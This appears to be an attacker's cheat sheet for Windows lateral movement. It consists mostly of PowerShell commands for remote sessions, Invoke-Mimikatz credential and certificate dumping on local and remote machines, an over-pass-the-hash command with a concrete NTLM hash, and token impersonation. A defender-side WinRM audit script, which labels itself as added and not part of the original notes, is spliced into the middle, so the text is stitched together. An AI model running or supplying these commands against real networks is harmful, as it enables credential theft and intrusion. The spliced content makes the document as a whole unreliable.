Lateral Movement Protocols And Tools

One-to-one:

  • PSSession
  • Interactive
  • Runs in a new process (wsmprovhost)
  • Is stateful
  • Useful cmdlets:
      • New-PSSession
      • Enter-PSSession

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> New-PSSession -ComputerName  WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Enter-PSSession -Session $sess
[WIN-2RUMVG5JPOC]: PS C:\Users\Administrator\Documents> hostname

One-to-many:

  • Also known as fan-out remoting.
  • Non-interactive.
  • Executes commands in parallel.
  • Useful cmdlet: Invoke-Command

Invoke-Command:

  • Runs commands & scripts:
      • On multiple remote computers
      • In disconnected sessions (v3)
      • As a background job & more

Use the -Credential parameter to pass a username/password:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads> Invoke-Command -FilePath .\Invoke-Encode.ps1 -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads> Invoke-Command -ScriptBlock{$who=whoami} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ScriptBlock{$who} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -scriptblock {Invoke-Mimikatz} -ComputerName WIN-2RUMVG5JPOC

Use the following to execute commands or semicolon-separated scripts (the second form reads the target list from a file):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {get-process} -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {get-process} -ComputerName (Get-Content .\test.txt)

Use the following to execute scripts from files, or to run several commands in one persistent session so that state (such as variables) is kept between calls:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {$who=whoami} -Session $sess

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Command -ScriptBlock {$who} -Session $sess
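Both the one-to-one (PSSession) and the one-to-many (Invoke-Command) forms above run on the target inside a wsmprovhost.exe process and leave entries in the WinRM operational log. The following script is an added defender-side example, not part of the original notes: run on a host, it lists who currently owns a remoting process and which WSMan shells were created recently. It assumes local administrator rights, that the WinRM operational log is enabled (the default), and the placeholder approved-account list and time window are constructed for illustration.

```powershell
# Added example: audit inbound PowerShell remoting on this host.
# Assumptions: run as a local administrator; the Microsoft-Windows-WinRM/Operational
# log is enabled; $Hours and $Expected below are placeholders to adjust per site.
param([int]$Hours = 24)

# 1. Live sessions. Every server-side PSSession / Invoke-Command runs in its own
#    wsmprovhost.exe, so the process owner is the account connected right now.
$live = Get-CimInstance Win32_Process -Filter "Name = 'wsmprovhost.exe'" |
    ForEach-Object {
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner
        [pscustomobject]@{
            Pid     = $_.ProcessId
            Owner   = '{0}\{1}' -f $owner.Domain, $owner.User
            Started = $_.CreationDate
        }
    }

# 2. Recent sessions. The WinRM operational log records each WSMan shell created
#    on this server (event 91) and the account that authenticated for it (event 168).
$since  = (Get-Date).AddHours(-$Hours)
$events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-WinRM/Operational'
        Id        = 91, 168
        StartTime = $since
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message

# 3. Triage. Any live session owned by an account outside the approved list is
#    the one to follow up on; the event list gives the history for the window.
$Expected = @('CONTOSO\svc-mgmt')   # placeholder: accounts allowed to remote in
Write-Host "Live remoting sessions not owned by an approved account:"
$live | Where-Object { $_.Owner -notin $Expected } | Format-Table -AutoSize

Write-Host "WSMan shells created in the last $Hours hour(s):"
$events | Format-Table -AutoSize -Wrap
```

Save it as a .ps1 and run it on the host being checked; pair the owner names with 4624 logon-type-3 events from the Security log if you need the source address of each session.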

Invoke-Mimikatz:

Dump credentials on a local machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCreds

Dump certs on a local machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCerts

"Over-pass-the-hash" (generate tokens from hashes):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:security.local /ntlm:638edc584b4d0a93fe3701b66d2f525b /run:powershell.exe"'

Dump credentials on multiple remote machines:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

Token manipulation:

List all the tokens on a machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Import-Module .\Invoke-TokenManipulation.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -ShowAll

List all unique usable tokens on the machine:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -Enumerate

Start a new process with the token of a specific user:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"

Start a new process with the token of another process:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-TokenManipulation -CreateProcess "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ProcessId 500

@Saksham Dixit